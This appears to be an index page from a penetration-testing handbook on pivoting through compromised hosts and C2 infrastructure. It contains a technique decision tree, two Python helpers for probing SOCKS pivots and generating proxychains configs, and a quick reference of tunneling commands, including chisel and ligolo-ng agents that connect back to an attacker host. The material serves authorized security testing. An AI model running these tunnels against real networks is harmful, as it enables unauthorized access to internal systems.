14 - Pivoting & C2 Infrastructure
#Overview
Pivoting transforms a single compromised host into a beachhead for the entire internal network. C2 infrastructure provides the persistent, resilient command and control layer that keeps that beachhead operational. This module covers both domains in depth: advanced tunneling and proxy techniques for reaching segmented networks, and C2 framework setup with redirector infrastructure for sustaining long-duration operations.
For the foundational pivoting quick-reference (SSH -D/-L/-R, Chisel, Ligolo-ng, socat, netsh, proxychains, Metasploit autoroute), see 07 - Post-Exploitation. This module extends that foundation with advanced tools, multi-hop chains, and operational C2 infrastructure.
#Decision Tree: Pivoting Technique Selection
```text
Compromised Host with Internal Network Access
        |
        v
Network Enumeration Complete?
  NO  ---> [Network Enumeration](network-enumeration.md) (interfaces, routes, ARP, IPv6)
  YES ---> What type of access needed?
              |
              |-- Full subnet access (scan, multiple services)
              |     |-- SOCKS proxy      ---> [SOCKS & HTTP Proxies](tunnels-and-proxies/socks-and-http-proxies.md)
              |     |-- HTTP-only egress ---> [Web Tunnels](tunnels-and-proxies/web-tunnels.md)
              |     |-- DNS-only egress  ---> [DNS & Protocol Tunnels](tunnels-and-proxies/dns-and-protocol-tunnels.md)
              |     |-- Cloud egress     ---> [Cloud Tunnels](tunnels-and-proxies/cloud-tunnels.md)
              |
              |-- Single port or specific service
              |     |-- SSH available       ---> [SSH Port Forwarding](port-forwarding/ssh-port-forwarding.md)
              |     |-- Native OS tools     ---> [Native Port Forwarding](port-forwarding/native-port-forwarding.md)
              |     |-- Meterpreter session ---> [Metasploit Routing](port-forwarding/metasploit-routing.md)
              |
              |-- Multiple network segments (2+ hops)
              |     |-- [Multi-Hop Chains](multi-hop-chains/index.md)
              |     |-- Docker container pivot ---> [Docker & IPv6 Pivoting](multi-hop-chains/docker-and-ipv6-pivoting.md)
              |     |-- Platform-specific      ---> [Platform Strategies](multi-hop-chains/platform-strategies.md)
              |
              |-- Need persistent C2 channel
                    |-- [C2 Infrastructure](c2-infrastructure/index.md)
                    |-- Framework setup  ---> [C2 Framework Setup](c2-infrastructure/c2-framework-setup.md)
                    |-- Redirectors      ---> [Redirectors & Fronting](c2-infrastructure/redirectors-and-fronting.md)
                    |-- Payload delivery ---> [Payload Staging](c2-infrastructure/payload-staging.md)
```
#General Methodology
#1. Enumerate the Network (Mandatory)
Before pivoting, understand what you're pivoting into. See Network Enumeration.
#2. Select the Least Noisy Technique
| Priority | Technique | When to Use |
|---|---|---|
| 1 | SSH -D/-L/-R | SSH available, no egress restrictions |
| 2 | sshuttle | Linux pivot with SSH and Python, need transparent routing to a whole subnet |
| 3 | Chisel/Ligolo-ng | SSH not available or cross-platform needed (Ligolo-ng gives a TUN interface, so tools run without proxychains) |
| 4 | Web tunnel | HTTP-only egress |
| 5 | DNS tunnel | DNS-only egress |
| 6 | Cloud tunnel | Cloud egress available, need persistence |
| 7 | Metasploit autoroute | Meterpreter session already active |
#3. Validate the Pivot
```bash
# After establishing a pivot, verify:
# 1. Can you reach the target subnet? Only full TCP connects cross a SOCKS proxy:
#    ICMP/ARP host discovery (-sn) and SYN scans (-sS) silently return nothing.
proxychains4 nmap -sT -Pn -n -p 22,80,445 172.16.0.0/24
# 2. Can you access target services?
proxychains4 curl -s http://172.16.0.10:8080/
# 3. Is the pivot stable?
# Test with a long-running connection
proxychains4 ssh user@172.16.0.10 "sleep 60 && echo stable"
```
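When a scan through the pivot comes back empty, proxychains' own output rarely says why. The following is an added example for this page, not code from the original page or from any of the tools it names: it performs the SOCKS5 handshake (RFC 1928) that proxychains wraps around every `connect()`, and reports the proxy's reply code, which separates "the pivot cannot route to that subnet" (network/host unreachable) from "the host is up but the port is closed" (connection refused). The proxy, target and port on the usage line are constructed placeholders; `ssh -D` and Chisel listeners both accept the no-authentication method the probe offers.

```python
"""Probe a SOCKS5 pivot directly instead of trusting a scanner's silence."""
import socket
import struct
import sys

# RFC 1928 section 6 reply codes
REPLY_CODES = {
    0x00: "succeeded",
    0x01: "general SOCKS server failure",
    0x02: "connection not allowed by ruleset",
    0x03: "network unreachable",
    0x04: "host unreachable",
    0x05: "connection refused",
    0x06: "TTL expired",
    0x07: "command not supported",
    0x08: "address type not supported",
}

# VER=5, NMETHODS=1, METHOD=0x00 (no authentication), as ssh -D / chisel offer
GREETING = b"\x05\x01\x00"


def build_connect_request(target: str, port: int) -> bytes:
    """VER CMD RSV ATYP DST.ADDR DST.PORT for a CONNECT (CMD=1).

    A dotted-quad target is sent as ATYP=1 (IPv4). Anything else is sent as
    ATYP=3 (domain name) so the pivot resolves it inside the target network,
    which is what proxychains' proxy_dns and curl's --socks5-hostname do.
    """
    try:
        dst = b"\x01" + socket.inet_aton(target)
    except OSError:
        name = target.encode()
        if len(name) > 255:
            raise ValueError("SOCKS5 domain names are limited to 255 bytes")
        dst = b"\x03" + bytes([len(name)]) + name
    return b"\x05\x01\x00" + dst + struct.pack("!H", port)


def parse_reply(data: bytes) -> tuple[int, str]:
    """Return (REP code, meaning) from the leading bytes of a SOCKS5 reply."""
    if len(data) < 2 or data[0] != 0x05:
        raise ValueError(f"not a SOCKS5 reply: {data!r}")
    code = data[1]
    return code, REPLY_CODES.get(code, f"unknown reply 0x{code:02x}")


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    """recv() may return short reads; collect exactly n bytes or fail."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection mid-handshake")
        buf += chunk
    return buf


def probe(proxy_host: str, proxy_port: int, target: str, port: int,
          timeout: float = 5.0) -> tuple[int, str]:
    """One CONNECT through the pivot's SOCKS5 listener; returns the proxy's verdict."""
    with socket.create_connection((proxy_host, proxy_port), timeout=timeout) as s:
        s.sendall(GREETING)
        if _recv_exact(s, 2) != b"\x05\x00":
            raise RuntimeError("proxy refused the no-authentication method")
        s.sendall(build_connect_request(target, port))
        # VER and REP are the first two reply bytes; that is all we need to classify it
        return parse_reply(_recv_exact(s, 2))


if __name__ == "__main__":
    # usage (constructed example): python3 socks_probe.py 127.0.0.1 1080 172.16.0.10 8080
    proxy_host, proxy_port, target, port = (sys.argv[1], int(sys.argv[2]),
                                            sys.argv[3], int(sys.argv[4]))
    code, meaning = probe(proxy_host, proxy_port, target, port)
    print(f"{target}:{port} via socks5://{proxy_host}:{proxy_port} -> {meaning}")
    sys.exit(0 if code == 0 else 1)
```

Run it once per target port before a full scan: a string of "network unreachable" replies means the pivot host itself has no route into the segment (go back to network enumeration), while "connection refused" confirms the pivot is fine and the port is simply closed.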
#4. Document the Pivot Chain
Always document the full pivot chain for the report:
- Source IP and port of each hop
- Tool and configuration used
- Credentials or keys required
- Network segments traversed
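One way to keep the documented chain and the working chain from drifting apart is to record the hops as data and generate the proxychains configuration from that record. The following is an added example for this page, not code from the original page or from proxychains itself; the two-hop chain, host addresses and credential references in it are constructed. It also illustrates the `strict_chain` rule that trips people up on multi-hop chains: each `[ProxyList]` entry after the first is contacted through the previous hop, so its address must be valid from that hop's vantage point (here the second `127.0.0.1` is the jump host's own loopback), not from the attacker box.

```python
"""Pivot chain as data: one record drives both the report and proxychains.conf."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Hop:
    name: str       # label used in the report
    tool: str       # how the SOCKS listener was created, and where it was run
    listen: str     # listener address as seen from the PREVIOUS hop (attacker for hop 1)
    port: int
    reaches: str    # segment this hop gives access to
    cred_ref: str   # reference to the credential (vault path, finding ID), never the secret
    proto: str = "socks5"


# Strings that mean a secret was pasted into the record instead of a reference
SECRET_MARKERS = ("password=", "pass:", "-----BEGIN", "NTLM:", "aad3b435b51404ee")


def check_chain(hops: list[Hop]) -> list[str]:
    """Problems that would make the config wrong or the report unsafe to hand over."""
    if not hops:
        return ["empty chain"]
    errors = []
    if hops[0].listen not in ("127.0.0.1", "localhost"):
        errors.append("hop 1 must be a listener on the attacker box "
                      "(ssh -D, or chisel client ... R:socks against a --reverse server)")
    seen = set()
    for h in hops:
        if h.name in seen:
            errors.append(f"duplicate hop name: {h.name}")
        seen.add(h.name)
        if any(m in h.cred_ref for m in SECRET_MARKERS):
            errors.append(f"{h.name}: cred_ref looks like a secret, record a reference instead")
        if not 0 < h.port < 65536:
            errors.append(f"{h.name}: invalid port {h.port}")
    return errors


def proxychains_conf(hops: list[Hop]) -> str:
    """strict_chain walks [ProxyList] in order: hop N is reached *through*
    hops 1..N-1, so every line after the first is an address that is valid
    inside the previous hop's network, not from the attacker box."""
    errors = check_chain(hops)
    if errors:
        raise ValueError("; ".join(errors))
    lines = ["strict_chain", "proxy_dns",
             "tcp_read_time_out 15000", "tcp_connect_time_out 8000", "[ProxyList]"]
    lines += [f"{h.proto} {h.listen} {h.port}" for h in hops]
    return "\n".join(lines) + "\n"


def report_table(hops: list[Hop]) -> str:
    """Markdown table for the report: one row per hop, credentials by reference."""
    rows = ["| # | Hop | Tool | Listener (from previous hop) | Reaches | Credential |",
            "|---|---|---|---|---|---|"]
    rows += [f"| {i} | {h.name} | {h.tool} | {h.proto}://{h.listen}:{h.port} "
             f"| {h.reaches} | {h.cred_ref} |" for i, h in enumerate(hops, 1)]
    return "\n".join(rows) + "\n"


# Constructed two-hop chain: SSH SOCKS from the attacker into the jump host, then a
# second ssh -D started ON the jump host towards a server-segment box. Its listener
# is the jump host's loopback, which is exactly what hop 1 connects to.
CHAIN = [
    Hop("dmz-jump", "ssh -D 1080 svc@10.0.10.5 (run on attacker)", "127.0.0.1", 1080,
        "172.16.0.0/24", "vault:engagements/acme/dmz-jump-ssh"),
    Hop("app01", "ssh -D 1081 svc@172.16.0.10 (run on dmz-jump)", "127.0.0.1", 1081,
        "10.20.0.0/24", "finding-07 (reused local admin)"),
]

if __name__ == "__main__":
    print(proxychains_conf(CHAIN))
    print(report_table(CHAIN))
```

Generate the config with `proxychains_conf(CHAIN)`, write it to the file you pass with `proxychains4 -f`, and paste `report_table(CHAIN)` into the report; if the chain changes, both change together.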
#What's in This Section
| Sub-Section | Covers |
|---|---|
| Network Enumeration | Interfaces, routes, ARP, IPv6, egress testing, firewall discovery |
| Tunnels & Proxies | SOCKS & HTTP, Web tunnels, DNS & protocol tunnels, Cloud tunnels |
| Port Forwarding | SSH forwarding, Native OS forwarding, Metasploit routing |
| Multi-Hop Chains | Proxy chaining, Docker & IPv6 pivoting, Platform strategies |
| C2 Infrastructure | Framework setup, Redirectors & fronting, Payload staging |
#Cross-References
- 07 - Post-Exploitation — Foundational pivoting quick-reference (SSH -D/-L/-R, Chisel, Ligolo-ng, socat, proxychains)
- 09 - Lateral Movement — After pivoting, use lateral movement techniques to spread
- 10 - Persistence — C2 persistence mechanisms
- 13 - Wireless Pentesting — Network segmentation bypass before pivoting
#Quick Reference: Essential Commands
```bash
# ── SOCKS Proxy (SSH) ──
ssh -D 1080 user@pivot                                    # Dynamic SOCKS proxy on attacker 127.0.0.1:1080
proxychains4 nmap -sT -Pn -n -p 22,80,445 172.16.0.0/24   # Route through SOCKS: TCP connect only, no ping/SYN/ARP

# ── SSH Port Forwarding ──
ssh -L 8080:172.16.0.10:80 user@pivot                     # Local forward: attacker:8080 -> 172.16.0.10:80 via pivot
ssh -R 8080:127.0.0.1:80 user@attacker                    # Remote forward: attacker:8080 -> pivot's 127.0.0.1:80
ssh -J pivot1,pivot2 user@target                          # ProxyJump chain

# ── sshuttle (Transparent) ──
sshuttle -r user@pivot 172.16.0.0/24                      # Transparent VPN-like proxy (needs Python on pivot); add --dns to tunnel DNS

# ── Chisel ──
chisel server -p 8080 --reverse                           # Server (attacker)
chisel client <attacker>:8080 R:socks                     # Client (pivot): SOCKS listener appears on attacker 127.0.0.1:1080

# ── Ligolo-ng ──
sudo ip tuntap add user $(whoami) mode tun ligolo && sudo ip link set ligolo up   # TUN interface (attacker)
sudo ./proxy -selfcert                                    # Proxy (attacker), listens on 11601
./agent -connect <attacker>:11601 -ignore-cert            # Agent (pivot)
# In the proxy console: session -> pick the agent -> start; then route the segment:
sudo ip route add 172.16.0.0/24 dev ligolo                # Routed pivot, no proxychains needed

# ── netsh (Windows) ──
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8080 connectaddress=172.16.0.10 connectport=80

# ── socat ──
socat TCP-LISTEN:8080,fork TCP:172.16.0.10:80            # TCP relay

# ── Egress Testing ──
curl -s http://<external_ip>:<port> --connect-timeout 5   # Test TCP egress
nslookup <external_domain>                                # Test DNS egress
```